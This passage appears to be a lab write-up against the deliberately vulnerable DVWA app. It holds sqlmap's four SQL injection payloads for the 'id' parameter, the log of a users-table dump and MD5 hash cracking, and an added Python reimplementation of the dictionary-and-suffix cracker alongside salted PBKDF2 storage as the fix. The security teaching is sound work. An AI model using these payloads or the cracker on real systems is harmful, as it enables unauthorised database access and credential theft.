---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 1427=1427#&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[09:39:12] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:14] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[09:39:17] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[09:39:18] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:34] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/
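
sqlmap's dictionary attack in step 4 (hash recognition, a bare-word pass, then the "common password suffixes" pass) is easy to reproduce, and doing so makes clear why the dump was so damaging: the password column holds unsalted MD5. The code below is an added example, not part of the original report and not sqlmap's code. The hashes are copied from the step 4 dump; the wordlist is a constructed stand-in for sqlmap's data/txt/wordlist.tx_ (it deliberately contains "abc" but not "abc123", so gordonb's hash falls only in the suffix pass, mirroring the second "cracked password 'abc123'" line that appears after suffix '123' in the log); the suffix list is the sequence the log printed. The last two functions are the fix on the storage side, salted PBKDF2-HMAC-SHA256 via hashlib; that is an addition for contrast, not anything DVWA does.

```python
import hashlib
import hmac
import os

# Copied from the step 4 dump (the DVWA default accounts).
DUMPED = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed stand-in for sqlmap's data/txt/wordlist.tx_ (a few entries
# only).  "abc" without "abc123" forces one hash into the suffix pass.
WORDLIST = ["123456", "qwerty", "password", "letmein", "charley", "abc", "dragon"]

# The suffixes in the order the sqlmap log tried them.
SUFFIXES = ["1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01",
            "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6",
            "18", "!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def looks_like_md5(value):
    # sqlmap's "recognized possible password hashes in column 'password'":
    # a 32-character hexadecimal string (DVWA stores it as varchar(32)).
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def crack(hashes, wordlist, suffixes=SUFFIXES, use_suffixes=True):
    """Dictionary attack in sqlmap's order: bare words first, then
    word+suffix for whatever is still unsolved.  Returns {hash: plaintext}."""
    targets = {h.lower() for h in hashes if looks_like_md5(h)}
    found = {}
    for word in wordlist:
        digest = md5_hex(word)
        if digest in targets:
            found.setdefault(digest, word)
    if use_suffixes:
        for suffix in suffixes:
            if len(found) == len(targets):
                break  # nothing left to crack; this is the slow part
            for word in wordlist:
                digest = md5_hex(word + suffix)
                if digest in targets:
                    found.setdefault(digest, word + suffix)
    return found


def annotate(dumped, found):
    # Rebuild sqlmap's "hash (plaintext)" column from the dump table.
    return {user: f"{h} ({found[h]})" if h in found else h for user, h in dumped.items()}


def shared_hashes(dumped):
    # With unsalted MD5, equal hashes mean equal passwords: admin and smithy
    # are exposed together before any cracking happens at all.
    groups = {}
    for user, h in dumped.items():
        groups.setdefault(h, []).append(user)
    return {h: users for h, users in groups.items() if len(users) > 1}


# --- the storage-side fix (added here for contrast; DVWA does not do this) --

def pbkdf2_store(password, iterations=600_000):
    # Per-user random salt + slow KDF: equal passwords no longer share a
    # record, and each guess costs `iterations` HMAC rounds instead of one MD5.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(stored, password):
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), dk_hex)  # constant-time compare


if __name__ == "__main__":
    cracked = crack(DUMPED.values(), WORDLIST)
    for user, shown in annotate(DUMPED, cracked).items():
        print(f"{user:8} {shown}")
    print("shared hashes:", shared_hashes(DUMPED))
    print("pbkdf2 record for 'password':", pbkdf2_store("password"))
```

Against a real wordlist the bare pass is where sqlmap spent a few seconds and the suffix pass where it spent seven minutes; the same asymmetry is why the defender's side of the example picks a deliberately slow KDF. Two calls to pbkdf2_store() with the same password produce different records, so the admin/smithy coincidence visible in the dump simply cannot be read off a table stored this way.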